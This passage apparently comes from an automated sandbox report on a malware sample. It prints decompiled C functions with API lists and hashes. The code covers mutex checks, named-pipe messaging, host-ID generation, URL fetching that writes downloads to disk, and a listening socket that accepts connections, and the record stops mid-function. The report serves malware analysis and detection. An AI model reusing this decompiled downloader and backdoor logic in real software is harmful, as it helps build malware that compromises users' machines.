    • String ID: D8@$GET$HTTP/1.1$POST
    • API String ID: 3080274660-3067359840
    • Opcode ID: e43c93d82e72bb53095c878edeff0992e7ae2f60b0d798be304154a3f6562bd8
    • Instruction ID: 04fdfc17a8499267acbb4109da10659d963d894b513dad18115b36a6b09a03c2
    • Opcode Fuzzy Hash: e43c93d82e72bb53095c878edeff0992e7ae2f60b0d798be304154a3f6562bd8
    • Instruction Fuzzy Hash: 7011E7725002096ADB219FA68C08FEB3E9CEF057A9F00C036BE04E2190C778C514C7E8
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00406CBE, Relevance: 13.6, APIs: 9, Instructions: 90sleepsynchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00406CBE(void* __ecx, void* __edi, intOrPtr _a4, int _a7) {
				int _v12;
				long _v16;
				void* _v20;
				short _v544;
				short _v1064;
				void* _t26;
				void* _t41;
				int _t44;
				void* _t45;
				void* _t46;

				_t46 = __edi;
				_t45 = __ecx;
				E0040988B(__edi, _a4, 1,  &_v544);
				E0040988B(__edi, _a4, 2,  &_v1064);
				_t44 = 0;
				_t26 = OpenMutexW(0x1f0001, 0,  &_v1064);
				if(_t26 == 0) {
					_t26 = OpenMutexW(0x1f0001, 0,  &_v544);
					if(_t26 != 0) {
						goto L1;
					}
					_v20 = CreateMutexW(0x413468, 1,  &_v544);
					if(E00406DC4(__edi, _t45, E004050C7 -  *0x412bac, 0) != 0) {
						_a7 = 1;
						_v16 = 0;
						_v12 = 0;
						while(GetExitCodeProcess(_t46,  &_v16) != 0) {
							if(_v16 != 0x103) {
								L15:
								_t44 = _a7;
								goto L5;
							}
							_t41 = OpenMutexW(0x1f0001, _t44,  &_v1064);
							if(_t41 != _t44) {
								CloseHandle(_t41);
								goto L15;
							}
							_v12 = _v12 + 1;
							if(_v12 > 0x1f4) {
								_a7 = _t44;
								goto L15;
							}
							Sleep(0x14);
						}
						goto L15;
					}
					L5:
					CloseHandle(_v20);
					return _t44;
				}
				L1:
				CloseHandle(_t26);
				return 0;
			}













    0x00406cbe
    0x00406cbe
    0x00406cd6
    0x00406ce8
    0x00406cf4
    0x00406cfd
    0x00406d05
    0x00406d1f
    0x00406d27
    0x00000000
    0x00000000
    0x00406d3d
    0x00406d56
    0x00406d65
    0x00406d69
    0x00406d6c
    0x00406da2
    0x00406d78
    0x00406dbf
    0x00406dbf
    0x00000000
    0x00406dbf
    0x00406d83
    0x00406d8b
    0x00406db4
    0x00000000
    0x00406db4
    0x00406d90
    0x00406d98
    0x00406dbc
    0x00000000
    0x00406dbc
    0x00406d9c
    0x00406d9c
    0x00000000
    0x00406db1
    0x00406d58
    0x00406d5b
    0x00000000
    0x00406d61
    0x00406d07
    0x00406d08
    0x00000000

    APIs
      • Part of subcall function 0040988B: GetProcessTimes.KERNEL32(00000002,00000002,?,?,?,?,?,?,?,?,00404E18,00000002,?), ref: 004098A4
      • Part of subcall function 0040988B: wnsprintfW.SHLWAPI ref: 004098C6
    • OpenMutexW.KERNEL32(001F0001,00000000,?,?,?,00000002,?,?,?,00000001,?), ref: 00406CFD
    • CloseHandle.KERNEL32(00000000,?,?,00000002,?,?,?,00000001,?), ref: 00406D08
    • OpenMutexW.KERNEL32(001F0001,00000000,?,?,?,00000002,?,?,?,00000001,?), ref: 00406D1F
    • CreateMutexW.KERNEL32(Function_00013468,00000001,?,?,?,00000002,?,?,?,00000001,?), ref: 00406D37
    • CloseHandle.KERNEL32(?,?,?,-0000DAE5,00000000,?,?,00000002,?,?,?,00000001,?), ref: 00406D5B
    • OpenMutexW.KERNEL32(001F0001,00000000,?,?,?,-0000DAE5,00000000,?,?,00000002,?,?,?,00000001,?), ref: 00406D83
    • Sleep.KERNEL32(00000014,?,?,-0000DAE5,00000000,?,?,00000002,?,?,?,00000001,?), ref: 00406D9C
    • GetExitCodeProcess.KERNEL32(?,?), ref: 00406DA7
    • CloseHandle.KERNEL32(00000000,?,?,-0000DAE5,00000000,?,?,00000002,?,?,?,00000001,?), ref: 00406DB4
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Mutex$CloseHandleOpen$Process$CodeCreateExitSleepTimeswnsprintf
    • String ID:
    • API String ID: 3355469312-0
    • Opcode ID: e83a6fb2344689a7cd6f414c0b15b10d2d4ee043fa65e0216b4943fa35335559
    • Instruction ID: 8873707bb9d8a888399207ea181069b1cb2372e6ed3b396ed993ab727a1a7baa
    • Opcode Fuzzy Hash: e83a6fb2344689a7cd6f414c0b15b10d2d4ee043fa65e0216b4943fa35335559
    • Instruction Fuzzy Hash: 283181B1600108BFDB109FA0DD84AEE7BBCEF05344F508076F606F2181D7788E558B69
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00409725, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 122stringCOMMON
    Download Yara Rule
    C-Code - Quality: 97%
    			E00409725(short* __edx) {
				long _v8;
				char _v12;
				short _v112;
				short _v632;
				signed char _t32;
				long _t39;
				intOrPtr _t41;
				long _t44;
				intOrPtr _t48;
				unsigned int _t50;
				long _t54;
				intOrPtr _t60;
				long _t63;
				void* _t67;
				short* _t70;
				void* _t73;
				CHAR* _t74;

				_t70 = __edx;
				_t32 =  *0x412af8; // 0x0
				asm("sbb esi, esi");
				_v8 = 0x206;
				_t73 =  ~(_t32 & 1) + 0x80000002;
				E0040CFFE( &_v632,  &_v632, 0, 0x208);
				if(__edx == 0xffffffff) {
					L9:
					_v8 = 0x31;
					if(GetComputerNameW( &_v112,  &_v8) == 0) {
						lstrcpyW( &_v112, L"unknown");
					}
					_t39 = GetTickCount();
					_t41 =  *0x412a64; // 0x246f5a8
					_t44 = wnsprintfW( &_v632, 0x103,  *(_t41 + 0x58),  &_v112, _t39) + _t43;
					L12:
					_v8 = _t44 + 2;
					_t48 =  *0x412a64; // 0x246f5a8
					E004075A2(_t73,  *((intOrPtr*)(_t48 + 0x34)),  *((intOrPtr*)(_t48 + 0x38)), 1,  &_v632, _t44 + 2);
					_t50 = _v8;
					L13:
					_v8 = (_t50 >> 1) - 1;
					_t74 = E0040D312((_t50 >> 1) - 1,  &_v632);
					_t54 = CharLowerBuffA(_t74, _v8);
					_t67 = 0;
					if(_v8 <= 0) {
						L20:
						 *0x412c14 = _t74;
						return _t54;
					} else {
						goto L14;
					}
					do {
						L14:
						_t54 =  *((intOrPtr*)(_t67 + _t74));
						if(_t54 < 0x61 || _t54 > 0x7a) {
							if(_t54 < 0x30 || _t54 > 0x39) {
								 *((char*)(_t67 + _t74)) = 0x5f;
							}
						}
						_t67 = _t67 + 1;
					} while (_t67 < _v8);
					goto L20;
				}
				if(__edx == 0 ||  *__edx == 0) {
					_t60 =  *0x412a64; // 0x246f5a8
					if(E00407559(_t73,  *((intOrPtr*)(_t60 + 0x34)),  *((intOrPtr*)(_t60 + 0x38)),  &_v12,  &_v632,  &_v8) != 0 && _v12 == 1) {
						_t50 = _v8;
						if(_t50 > 4) {
							goto L13;
						}
					}
					goto L9;
				} else {
					_t63 = E0040D3D8(__edx) + _t62;
					_v8 = _t63;
					if(_t63 >= 0x204) {
						_t63 = 0x204;
					}
					E0040CF7C( &_v632, _t70, _t63);
					_t44 = _v8;
					goto L12;
				}
			}




















    0x00409725
    0x0040972e
    0x00409748
    0x0040974b
    0x00409752
    0x00409758
    0x00409760
    0x004097cb
    0x004097d3
    0x004097e2
    0x004097ed
    0x004097ed
    0x004097f3
    0x004097fe
    0x0040981b
    0x0040981d
    0x00409820
    0x0040982a
    0x00409838
    0x0040983d
    0x00409840
    0x0040984a
    0x00409855
    0x00409858
    0x0040985e
    0x00409863
    0x00409882
    0x00409882
    0x0040988a
    0x00000000
    0x00000000
    0x00000000
    0x00409865
    0x00409865
    0x00409865
    0x0040986a
    0x00409872
    0x00409878
    0x00409878
    0x00409872
    0x0040987c
    0x0040987d
    0x00000000
    0x00409865
    0x00409764
    0x004097a8
    0x004097bb
    0x004097c3
    0x004097c9
    0x00000000
    0x00000000
    0x004097c9
    0x00000000
    0x0040976c
    0x00409773
    0x0040977a
    0x0040977f
    0x00409781
    0x00409781
    0x0040978c
    0x00409791
    0x00000000
    0x00409791

    APIs
    • GetComputerNameW.KERNEL32(?,00000206), ref: 004097DA
    • lstrcpyW.KERNEL32(?,unknown), ref: 004097ED
    • GetTickCount.KERNEL32 ref: 004097F3
    • wnsprintfW.SHLWAPI ref: 00409812
    • CharLowerBuffA.USER32(00000000,00000031,?,?,?,?,00000001,?,00000002), ref: 00409858
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: BuffCharComputerCountLowerNameTicklstrcpywnsprintf
    • String ID: 1$unknown
    • API String ID: 2565877886-2453001258
    • Opcode ID: 160e39a0b512e880e07b37484d8ce43ac87c353f8e6dbb69bf94d177fefe40e4
    • Instruction ID: 829a1b6f517f72b74bb117326a77847a7f13e8fc37162dfe65f6b294f105fcfa
    • Opcode Fuzzy Hash: 160e39a0b512e880e07b37484d8ce43ac87c353f8e6dbb69bf94d177fefe40e4
    • Instruction Fuzzy Hash: D7419972910108EADF24EBA8CE49ADE77B9EB05304F1041BAE505E7292D7789E41DB58
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040643F, Relevance: 10.6, APIs: 7, Instructions: 144networkCOMMON
    Download Yara Rule
    C-Code - Quality: 70%
    			E0040643F(void* _a4, long* _a8) {
				char _v5;
				signed int _v12;
				char _v16;
				char* _v20;
				char _v24;
				char* _v28;
				char _v48;
				char _v1564;
				char _v1568;
				void* __ebx;
				void* __esi;
				signed int _t56;
				intOrPtr _t63;
				int _t65;
				intOrPtr _t66;
				char* _t69;
				long _t70;
				intOrPtr _t71;
				signed int _t79;
				long* _t81;
				signed int _t82;
				char* _t89;
				void* _t91;
				signed int _t92;
				signed int _t93;
				void* _t95;

				_t79 = 0;
				_t91 =  *0x412bcc(2, 2, 0);
				if(_t91 != 0xffffffff) {
					_v12 = 0;
					 *0x412bfc(_t91, 0x4004747f, 0, 0,  &_v1568, 0x5f0,  &_v12, 0, 0);
					 *0x412bb8(_t91);
					_t82 = 0x4c;
					_t56 = _v12 / _t82;
					_t92 = 0;
					_v5 = 1;
					_v16 = 0;
					_v20 = 0;
					_v12 = _t56;
					if(_t56 <= 0) {
						L23:
						return _t56 & 0xffffff00 | _v12 != _t79;
					}
					_t89 =  &_v1564;
					do {
						if(( *(_t89 - 4) & 0x00000001) == 0) {
							goto L17;
						}
						_t56 = E00406114(_t89);
						if(_t56 != 0) {
							goto L17;
						}
						if(_v5 != _t79) {
							_t66 =  *0x412a8c; // 0x416000
							_t18 = _t66 + 0x24; // 0xe001b
							_t84 =  *_t18 & 0x000000ff;
							_t19 = _t66 + 0x26; // 0x400000e
							_t21 = _t66 + 0x12c; // 0xe0147
							_t56 = E00409418( &_v24,  *_t19 & 0x000000ff, _t92, ( *_t18 & 0x000000ff) + _t21);
							_t92 = _t56;
							if(_t92 != 0) {
								_t69 = E0040D0D5(_t56, _v24);
								_t92 = 0;
								_v28 = _t69;
								if(_t69 != 0) {
									_t70 = GetTickCount();
									_t81 = _a8;
									 *_t81 = _t70;
									_t71 =  *0x412a8c; // 0x416000
									_t26 = _t71 + 0x28; // 0xd96c0400
									_t93 =  *_t26 & 0x0000ffff;
									if(InternetOpenUrlA(_a4, _v28, 0, 0, 0x84043300, 0) != 0) {
										_t92 = E004060CC(_t84,  &_v16, _t93, _t73);
									} else {
										_t92 = 0;
									}
									 *_t81 = GetTickCount() -  *_t81;
									E0040CF40(_v28);
								}
								_t56 = E0040CF40(_v24);
							}
							_v5 = 0;
							_t79 = 0;
						}
						if(_t92 == _t79) {
							L22:
							goto L23;
						} else {
							_t63 =  *0x412a64; // 0x246f5a8
							_t65 = wnsprintfA( &_v48, 0x14,  *(_t63 + 0x6c),  *(_t89 + 4) & 0x000000ff,  *(_t89 + 5) & 0x000000ff,  *(_t89 + 6) & 0x000000ff,  *(_t89 + 7) & 0x000000ff);
							_t95 = _t95 + 0x1c;
							_t56 = E00408C0D( &_v48, _t65, _v16, _t92, _t79, _t79, _t79);
							if(_t56 != 0) {
								_v12 = _t79;
								L20:
								if(_t92 != _t79) {
									_t56 = E0040CF40(_v16);
								}
								goto L22;
							}
						}
						L17:
						_v20 =  &(_v20[1]);
						_t56 = _v20;
						_t89 = _t89 + 0x4c;
					} while (_t56 < _v12);
					goto L20;
				}
				return 0;
			}





























    0x0040644a
    0x00406457
    0x0040645c
    0x0040647f
    0x00406482
    0x00406489
    0x00406496
    0x00406497
    0x00406499
    0x0040649b
    0x0040649f
    0x004064a2
    0x004064a5
    0x004064aa
    0x004065d3
    0x00000000
    0x004065d6
    0x004064b1
    0x004064b7
    0x004064bb
    0x00000000
    0x00000000
    0x004064c3
    0x004064ca
    0x00000000
    0x00000000
    0x004064d3
    0x004064d9
    0x004064de
    0x004064de
    0x004064e2
    0x004064e6
    0x004064f1
    0x004064f6
    0x004064fa
    0x004064ff
    0x00406504
    0x00406506
    0x0040650b
    0x0040650d
    0x00406513
    0x00406516
    0x00406518
    0x0040651d
    0x0040651d
    0x00406539
    0x00406549
    0x0040653b
    0x0040653b
    0x0040653b
    0x00406556
    0x00406558
    0x00406558
    0x00406560
    0x00406560
    0x00406565
    0x00406569
    0x00406569
    0x0040656d
    0x004065d2
    0x00000000
    0x0040656f
    0x00406583
    0x00406591
    0x00406597
    0x004065a6
    0x004065ad
    0x004065c3
    0x004065c6
    0x004065c8
    0x004065cd
    0x004065cd
    0x00000000
    0x004065c8
    0x004065ad
    0x004065af
    0x004065af
    0x004065b2
    0x004065b5
    0x004065b8
    0x00000000
    0x004065c1
    0x00000000

    APIs
    • socket.WS2_32(00000002,00000002,00000000), ref: 00406451
    • WSAIoctl.WS2_32(00000000,4004747F,00000000,00000000,?,000005F0,?,00000000,00000000), ref: 00406482
    • closesocket.WS2_32(00000000), ref: 00406489
    • GetTickCount.KERNEL32 ref: 0040650D
    • InternetOpenUrlA.WININET(?,?,00000000,00000000,84043300,00000000), ref: 00406531
    • GetTickCount.KERNEL32 ref: 0040654B
    • wnsprintfA.SHLWAPI ref: 00406591
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CountTick$InternetIoctlOpenclosesocketsocketwnsprintf
    • String ID:
    • API String ID: 1843894412-0
    • Opcode ID: 1e79e01054fa3da93f0d4baabcb9cabae2166530d30fadfd7f449d2b2f9c5141
    • Instruction ID: a03ef770ef415d6105fd1c409c0fc46fc2fe7ffa6a8b7aab6adad1149690444a
    • Opcode Fuzzy Hash: 1e79e01054fa3da93f0d4baabcb9cabae2166530d30fadfd7f449d2b2f9c5141
    • Instruction Fuzzy Hash: CF51A4B1800129BFDB119FA4DC85AEFBBB8AF05314F018176F901F31D5C6389E648B68
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00408464, Relevance: 10.6, APIs: 7, Instructions: 119synchronizationthreadnetworkCOMMON
    Download Yara Rule
    C-Code - Quality: 31%
    			E00408464() {
				intOrPtr _v12;
				short* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				short _v46;
				char _v48;
				short _v86;
				char _v88;
				signed int _v348;
				signed int _v352;
				void* __edi;
				short _t39;
				signed int _t40;
				signed int _t42;
				void* _t47;
				intOrPtr* _t52;
				intOrPtr _t62;
				void* _t67;
				signed int _t68;
				signed int _t69;
				signed int _t70;
				void* _t72;

				_v20 = 0;
				_v16 = 0x41297c;
				_v12 = E00408418;
				E0040CFFE( &_v88,  &_v88, 0, 0x26);
				_t39 = 2;
				_v88 = _t39;
				_t68 = 0x9c40;
				while(1) {
					_t40 = E0040DF05();
					asm("rol dx, 0x8");
					_v86 = _t40 % 0x7531 + 0x2710;
					_t42 = E0040E2D4( &_v88, 0x10, 0x7fffffff);
					if(_t42 != 0xffffffff) {
						break;
					}
					_t68 = _t68 - 1;
					if(_t68 > 0) {
						continue;
					} else {
						_t69 = _t68 | _t42;
						L4:
						if(_t69 != 0xffffffff) {
							_push( &_v24);
							_push( &_v48);
							_push(_t69);
							_v24 = 0x10;
							if( *0x412bf0() == 0) {
								asm("rol ax, 0x8");
								_v20 = _t69;
								 *0x41297c = _v46;
							}
						}
						_v32 = 0;
						_v28 = 0xf4240;
						while(WaitForSingleObject( *0x412974, 0x64) != 0) {
							_v348 = _v20;
							_v352 = 1;
							_t47 =  *0x412c00(0,  &_v352, 0, 0,  &_v32);
							if(_t47 == 0xffffffff) {
								break;
							}
							if(_t47 <= 0) {
								continue;
							}
							L19:
							while(_v352 != 0) {
								_v352 = _v352 - 1;
								_t62 =  *((intOrPtr*)(_t72 + _v352 * 4 - 0x158));
								_t70 = 0;
								_t52 =  &_v20;
								while(_t62 !=  *_t52) {
									_t70 = _t70 + 1;
									_t52 = _t52 + 0xc;
									if(_t70 < 1) {
										continue;
									}
									goto L19;
								}
								_t71 = _t70 * 0xc;
								_t67 =  *0x412bd8( *((intOrPtr*)(_t72 + _t70 * 0xc - 0x10)), 0, 0);
								if(_t67 != 0xffffffff) {
									 *0x412970 =  *0x412970 + 1;
									if(E0040A04D(_t62,  *((intOrPtr*)(_t72 + _t71 - 8)), _t67) == 0) {
										 *0x412bb8(_t67);
										 *0x412970 =  *0x412970 - 1;
									}
								}
							}
						}
						 *0x412bb8(_v20);
						 *0x412970 =  *0x412970 - 1;
						_push(0);
						RtlExitUserThread();
						return 0;
					}
				}
				_t69 = _t42;
				goto L4;
			}



























    0x00408479
    0x0040847c
    0x00408483
    0x0040848a
    0x00408491
    0x00408492
    0x00408496
    0x0040849b
    0x0040849b
    0x004084b9
    0x004084bd
    0x004084c1
    0x004084c9
    0x00000000
    0x00000000
    0x004084cb
    0x004084ce
    0x00000000
    0x004084d0
    0x004084d0
    0x004084d2
    0x004084d5
    0x004084da
    0x004084de
    0x004084df
    0x004084e0
    0x004084ef
    0x004084f5
    0x004084f9
    0x004084fc
    0x004084fc
    0x004084ef
    0x00408502
    0x00408505
    0x004085b1
    0x00408518
    0x0040852c
    0x00408536
    0x0040853f
    0x00000000
    0x00000000
    0x00408547
    0x00000000
    0x00000000
    0x00000000
    0x004085a9
    0x0040854b
    0x00408557
    0x0040855e
    0x00408560
    0x00408563
    0x00408567
    0x00408568
    0x0040856e
    0x00000000
    0x00000000
    0x00000000
    0x00408570
    0x00408572
    0x00408581
    0x00408586
    0x00408588
    0x0040859a
    0x0040859d
    0x004085a3
    0x004085a3
    0x0040859a
    0x00408586
    0x004085a9
    0x004085ca
    0x004085d0
    0x004085d6
    0x004085d7
    0x004085e3
    0x004085e3
    0x004084ce
    0x00408511
    0x00000000

    APIs
      • Part of subcall function 0040DF05: GetTickCount.KERNEL32 ref: 0040DF05
      • Part of subcall function 0040E2D4: socket.WS2_32(?,00000001,00000006), ref: 0040E2DD
      • Part of subcall function 0040E2D4: bind.WS2_32(00000000,?,?), ref: 0040E2F0
      • Part of subcall function 0040E2D4: listen.WS2_32(00000000,?), ref: 0040E2FF
      • Part of subcall function 0040E2D4: closesocket.WS2_32(00000000), ref: 0040E30A
    • getsockname.WS2_32(00000000,?,?), ref: 004084E7
    • select.WS2_32(00000000,?,00000000,00000000,?), ref: 00408536
    • accept.WS2_32(?,00000000,00000000), ref: 0040857B
    • closesocket.WS2_32(00000000), ref: 0040859D
    • WaitForSingleObject.KERNEL32(00000064,00000010,7FFFFFFF,?,00000000,00000026), ref: 004085B9
    • closesocket.WS2_32(?), ref: 004085CA
    • RtlExitUserThread.NTDLL(00000000), ref: 004085D7
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: closesocket$CountExitObjectSingleThreadTickUserWaitacceptbindgetsocknamelistenselectsocket
    • String ID:
    • API String ID: 1067960629-0
    • Opcode ID: 03b24a7a3d50f7f04edbaac7a9506a0ee0ec1024029288ae2d1811a1eba8969e
    • Instruction ID: 5ceb0ee77c47aa702db4f66acc73852a285a66162c5f4fbb8dace1754a8f4f7d
    • Opcode Fuzzy Hash: 03b24a7a3d50f7f04edbaac7a9506a0ee0ec1024029288ae2d1811a1eba8969e
    • Instruction Fuzzy Hash: B641D371900119AEDB109FA8DE889EE7778FF44314F10453BE962F22E0EBB84D558F99
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040D913, Relevance: 10.6, APIs: 7, Instructions: 78filememorysynchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040D913(void* __edi, void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
				char _v5;
				long _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				long _t32;
				void* _t37;
				void* _t39;

				_v5 = 0;
				_t39 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
				if(_t39 == 0xffffffff) {
					L15:
					return _v5;
				}
				_t37 = RtlAllocateHeap( *0x413e5c, 8, 0x1004);
				if(_t37 == 0) {
					L13:
					CloseHandle(_t39);
					if(_v5 == 0) {
						E0040DD3C(_a8);
					}
					goto L15;
				}
				_v16 = 0;
				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
					if(InternetReadFile(_a4, _t37, 0x1000,  &_v12) == 0) {
						break;
					}
					if(_v12 == 0) {
						FlushFileBuffers(_t39);
						_v5 = 1;
						break;
					}
					if(WriteFile(_t39, _t37, _v12,  &_v20, 0) == 0) {
						break;
					}
					_t32 = _v12;
					if(_t32 != _v20) {
						break;
					}
					_v16 = _v16 + _t32;
					if(_v16 <= _a12) {
						continue;
					}
					break;
				}
				E0040CF40(_t37);
				goto L13;
			}










    0x0040d930
    0x0040d939
    0x0040d93e
    0x0040d9e2
    0x0040d9e8
    0x0040d9e8
    0x0040d958
    0x0040d95c
    0x0040d9cd
    0x0040d9ce
    0x0040d9d8
    0x0040d9dd
    0x0040d9dd
    0x00000000
    0x0040d9d8
    0x0040d95e
    0x0040d961
    0x0040d98c
    0x00000000
    0x00000000
    0x0040d991
    0x0040d9bd
    0x0040d9c3
    0x00000000
    0x0040d9c3
    0x0040d9a5
    0x00000000
    0x00000000
    0x0040d9a7
    0x0040d9ad
    0x00000000
    0x00000000
    0x0040d9af
    0x0040d9b8
    0x00000000
    0x00000000
    0x00000000
    0x0040d9ba
    0x0040d9c8
    0x00000000

    APIs
    • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040D933
    • RtlAllocateHeap.NTDLL(00000008,00001004,?), ref: 0040D952
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D96A
    • InternetReadFile.WININET(?,00000000,00001000,?), ref: 0040D984
    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040D99D
    • FlushFileBuffers.KERNEL32(00000000), ref: 0040D9BD
    • CloseHandle.KERNEL32(00000000), ref: 0040D9CE
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$AllocateBuffersCloseCreateFlushHandleHeapInternetObjectReadSingleWaitWrite
    • String ID:
    • API String ID: 4284787851-0
    • Opcode ID: eb18521934f989b2b97c3d633ef98fc08f2800bd459c79f4585bcc506700614b
    • Instruction ID: 6c4d087222c7b84599c6def3267490e2be1d22d4e95e2927a8098ada68969aa7
    • Opcode Fuzzy Hash: eb18521934f989b2b97c3d633ef98fc08f2800bd459c79f4585bcc506700614b
    • Instruction Fuzzy Hash: F42157B1900248BBDF219BE4DC84AEF7B78AB00310F008476F951B2290D7798D598B28
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040FB22, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 78sleepCOMMON
    Download Yara Rule
    C-Code - Quality: 83%
    			E0040FB22(void* __ecx, void* __edx) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				void* _t20;
				void* _t29;
				WCHAR** _t40;

				_t40 = 0x403914;
				_v24 = 2;
				do {
					_t20 = OpenMutexW(0x1f0001, 0,  *_t40);
					if(_t20 == 0) {
						goto L13;
					}
					CloseHandle(_t20);
					E0040F9F9( *_t40, 0xb,  &_v12);
					_t3 =  &_v16; // 0x405c43
					E0040F9F9( *_t40, 0xc, _t3);
					E0040F9F9( *_t40, 0xd,  &_v20);
					E0040F9F9( *_t40, 3, 0);
					_v5 = 0;
					while(1) {
						_t29 = OpenMutexW(0x1f0001, 0,  *_t40);
						if(_t29 == 0) {
							break;
						}
						CloseHandle(_t29);
						Sleep(0x3e8);
						_v5 = _v5 + 1;
						if(_v5 < 0xa) {
							continue;
						}
						L12:
						E0040CF40(_v12);
						_t16 =  &_v16; // 0x405c43
						E0040CF40( *_t16);
						_t20 = E0040CF40(_v20);
						goto L13;
					}
					if(_v12 != 0) {
						E0040DD3C(_v12);
					}
					if(_v16 != 0) {
						_t12 =  &_v16; // 0x405c43
						E0040DD3C( *_t12);
					}
					if(_v20 != 0) {
						E0040DD3C(_v20);
					}
					goto L12;
					L13:
					_t40 =  &(_t40[1]);
					_t18 =  &_v24;
					 *_t18 = _v24 - 1;
				} while ( *_t18 != 0);
				return _t20;
			}











    0x0040fb2b
    0x0040fb30
    0x0040fb3e
    0x0040fb42
    0x0040fb4a
    0x00000000
    0x00000000
    0x0040fb51
    0x0040fb5f
    0x0040fb64
    0x0040fb6c
    0x0040fb79
    0x0040fb83
    0x0040fb88
    0x0040fb8b
    0x0040fb8f
    0x0040fb97
    0x00000000
    0x00000000
    0x0040fb9a
    0x0040fba5
    0x0040fbab
    0x0040fbb2
    0x00000000
    0x00000000
    0x0040fbdd
    0x0040fbe0
    0x0040fbe5
    0x0040fbe8
    0x0040fbf0
    0x00000000
    0x0040fbf0
    0x0040fbb9
    0x0040fbbe
    0x0040fbbe
    0x0040fbc6
    0x0040fbc8
    0x0040fbcb
    0x0040fbcb
    0x0040fbd3
    0x0040fbd8
    0x0040fbd8
    0x00000000
    0x0040fbf5
    0x0040fbf5
    0x0040fbf8
    0x0040fbf8
    0x0040fbf8
    0x0040fc05

    APIs
    • OpenMutexW.KERNEL32(001F0001,00000000,00403914,?,?,00000000), ref: 0040FB42
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040FB51
      • Part of subcall function 0040F9F9: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,\\.\pipe\,00000012,001F0001,00403914,00000000), ref: 0040FA72
      • Part of subcall function 0040F9F9: SetNamedPipeHandleState.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040FA8D
      • Part of subcall function 0040F9F9: WriteFile.KERNEL32(00000000,?,00000008,00000002,00000000), ref: 0040FAAC
      • Part of subcall function 0040F9F9: ReadFile.KERNEL32(00000000,?,00000008,00000002,00000000), ref: 0040FAC2
      • Part of subcall function 0040F9F9: CloseHandle.KERNEL32(00000000), ref: 0040FAE3
      • Part of subcall function 0040F9F9: WaitNamedPipeW.KERNEL32(?,000000FF), ref: 0040FA5A
      • Part of subcall function 0040F9F9: ReadFile.KERNEL32(00000000,00000000,?,00000008,00000000), ref: 0040FB05
    • OpenMutexW.KERNEL32(001F0001,00000000,00403914,00403914,00000003,00000000,00403914,0000000D,?,00403914,0000000C,C\@,00403914,0000000B,?), ref: 0040FB8F
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040FB9A
    • Sleep.KERNEL32(000003E8,?,?,00000000), ref: 0040FBA5
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: FileHandle$Close$MutexNamedOpenPipeRead$CreateSleepStateWaitWrite
    • String ID: C\@
    • API String ID: 2066843493-3981424963
    • Opcode ID: 73d04ec097e37e16b5aa3180bd21f71067241e5b6cffa7d7e8f4aee1e8c76210
    • Instruction ID: 7f631a189950b2c8a89bda6831585f21ea3ff56f9cc767dc00ffa2bb5b7e7ccb
    • Opcode Fuzzy Hash: 73d04ec097e37e16b5aa3180bd21f71067241e5b6cffa7d7e8f4aee1e8c76210
    • Instruction Fuzzy Hash: BF218E71900109BBDF22AFE5DC85EAEBB79AF00344F10447BF240B10A1DB795A599B59
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004068AD, Relevance: 10.6, APIs: 7, Instructions: 77stringCOMMON
    Download Yara Rule
    C-Code - Quality: 77%
    			E004068AD(void* __eax, void* __edi, intOrPtr _a4) {
				int _t10;
				void* _t11;
				intOrPtr _t12;
				intOrPtr* _t23;
				int _t24;
				void* _t26;
				void* _t28;
				void* _t29;
				void* _t30;
				void _t31;

				_t28 = __edi;
				_t29 = __eax;
				if(__eax != 0) {
					L8:
					_t26 = 0;
					if(IsBadHugeReadPtr(_t29, 0x14) != 0) {
						L16:
						_t10 = IsBadHugeReadPtr(_t29, 0x14);
						if(_t10 != 0 ||  *((intOrPtr*)(_t29 + 0xc)) == _t10) {
							L19:
							_t11 = 0;
							goto L20;
						} else {
							_t11 = _t29;
							L20:
							return _t11;
						}
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t12 =  *((intOrPtr*)(_t29 + 0xc));
						if(_t12 == 0) {
							break;
						}
						if(IsBadHugeReadPtr(_t12 + _t28, 2) == 0) {
							_push(_a4);
							_push( *((intOrPtr*)(_t29 + 0xc)) + _t28);
							_t26 = 0;
							if( *0x412cc8() == 0) {
								goto L16;
							}
							L14:
							_t29 = _t29 + 0x14;
